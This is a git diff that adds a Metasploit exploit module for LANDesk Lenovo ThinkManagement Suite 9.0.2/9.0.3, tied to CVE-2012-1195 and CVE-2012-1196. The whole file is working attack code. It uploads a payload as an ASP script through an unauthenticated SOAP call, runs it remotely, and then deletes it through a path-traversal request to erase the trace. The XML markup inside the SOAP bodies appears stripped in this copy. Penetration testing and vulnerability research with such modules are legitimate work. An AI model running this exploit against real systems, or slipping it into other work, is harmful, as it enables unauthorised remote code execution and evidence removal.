diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
new file mode 100644
index 0000000000..e4a0a987f3
--- /dev/null
+++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
@@ -0,0 +1,174 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize
+ super(
+ 'Name' => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution',
+ 'Description' => %q{
+ This module can be used to execute a payload on LANDesk Lenovo
+ ThinkManagement Suite 9.0.2 and 9.0.3.
+ The payload is uploaded as an ASP script sending a specially crafted
+ SOAP request to "/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
+ specifying a "RunAMTCommand" operation with the command '-PutUpdateFileCore'
+ as argument.
+ After execution the ASP script with the payload is deleted sending a
+ specially crafted SOAP request to "WSVulnerabilityCore/VulCore.asmx"
+ specifying a "SetTaskLogByFile" operation.
+ },
+ 'Author' => [
+ 'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC
+ 'juan vazquez' # Metasploit module
+ ],
+ 'Version' => '$Revision: $',
+ 'Platform' => 'win',
+ 'References' =>
+ [
+ ['CVE', '2012-1195'],
+ ['CVE', '2012-1196'],
+ ['OSVDB', '79276'],
+ ['OSVDB', '79277'],
+ ['BID', '52023'],
+ ['URL', 'http://www.exploit-db.com/exploits/18622/'],
+ ['URL', 'http://www.exploit-db.com/exploits/18623/']
+ ],
+ 'Targets' =>
+ [
+ [ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ],
+ ],
+ 'DefaultTarget' => 0,
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Feb 15 2012'
+ )
+
+ register_options(
+ [
+ OptString.new('PATH', [ true, "The URI path of the LANDesk Lenovo ThinkManagement Console", '/'])
+ ], self.class)
+ end
+
+ def exploit
+
+ # Generate the ASP containing the EXE containing the payload
+ exe = generate_payload_exe
+ asp = Msf::Util::EXE.to_exe_asp(exe)
+
+ # htmlentities like encoding
+ asp = asp.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">")
+
+ uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
+ upload_random = rand_text_alpha(rand(6) + 6)
+ upload_xml_path = "ldlogon\\#{upload_random}.asp"
+
+ soap = <<-eos
+
+
+
+
+ -PutUpdateFileCore
+ #{rand_text_alpha(rand(4) + 4)}
+ #{upload_xml_path}
+ #{asp}
+ #{rand_text_alpha(rand(4) + 4)}
+
+
+
+ eos
+
+ #
+ # UPLOAD
+ #
+ attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
+ print_status("Uploading #{asp.length} bytes through #{attack_url}...")
+
+ res = send_request_cgi({
+ 'uri' => attack_url,
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=utf-8',
+ 'headers' => {
+ 'SOAPAction' => "\"http://tempuri.org/RunAMTCommand\"",
+ },
+ 'data' => soap,
+ }, 20)
+
+ if (! res)
+ print_status("Timeout - Trying to execute the payload anyway")
+ elsif (res.code < 200 or res.code >= 300)
+ print_error("Upload failed on #{attack_url} [#{res.code} #{res.message}]")
+ return
+ end
+
+ #
+ # EXECUTE
+ #
+ upload_path = uri_path + "ldlogon/#{upload_random}.asp"
+ print_status("Executing #{upload_path}...")
+
+ res = send_request_cgi({
+ 'uri' => upload_path,
+ 'method' => 'GET'
+ }, 20)
+
+ if (! res)
+ print_error("Execution failed on #{upload_path} [No Response]")
+ return
+ end
+
+ if (res.code < 200 or res.code >= 300)
+ print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]")
+ return
+ end
+
+
+ #
+ # DELETE
+ #
+ soap = <<-eos
+
+
+
+
+ 1
+ 1
+ ../#{upload_random}.asp
+
+
+
+ eos
+
+ attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx"
+ print_status("Deleting #{upload_path} through #{attack_url}...")
+
+ res = send_request_cgi({
+ 'uri' => attack_url,
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=utf-8',
+ 'headers' => {
+ 'SOAPAction' => "\"http://tempuri.org/SetTaskLogByFile\"",
+ },
+ 'data' => soap,
+ }, 20)
+
+ if (! res)
+ print_error("Deletion failed on #{attack_url} [No Response]")
+ return
+ elsif (res.code < 200 or res.code >= 300)
+ print_error("Deletion failed on #{attack_url} [#{res.code} #{res.message}]")
+ return
+ end
+
+ handler
+ end
+
+end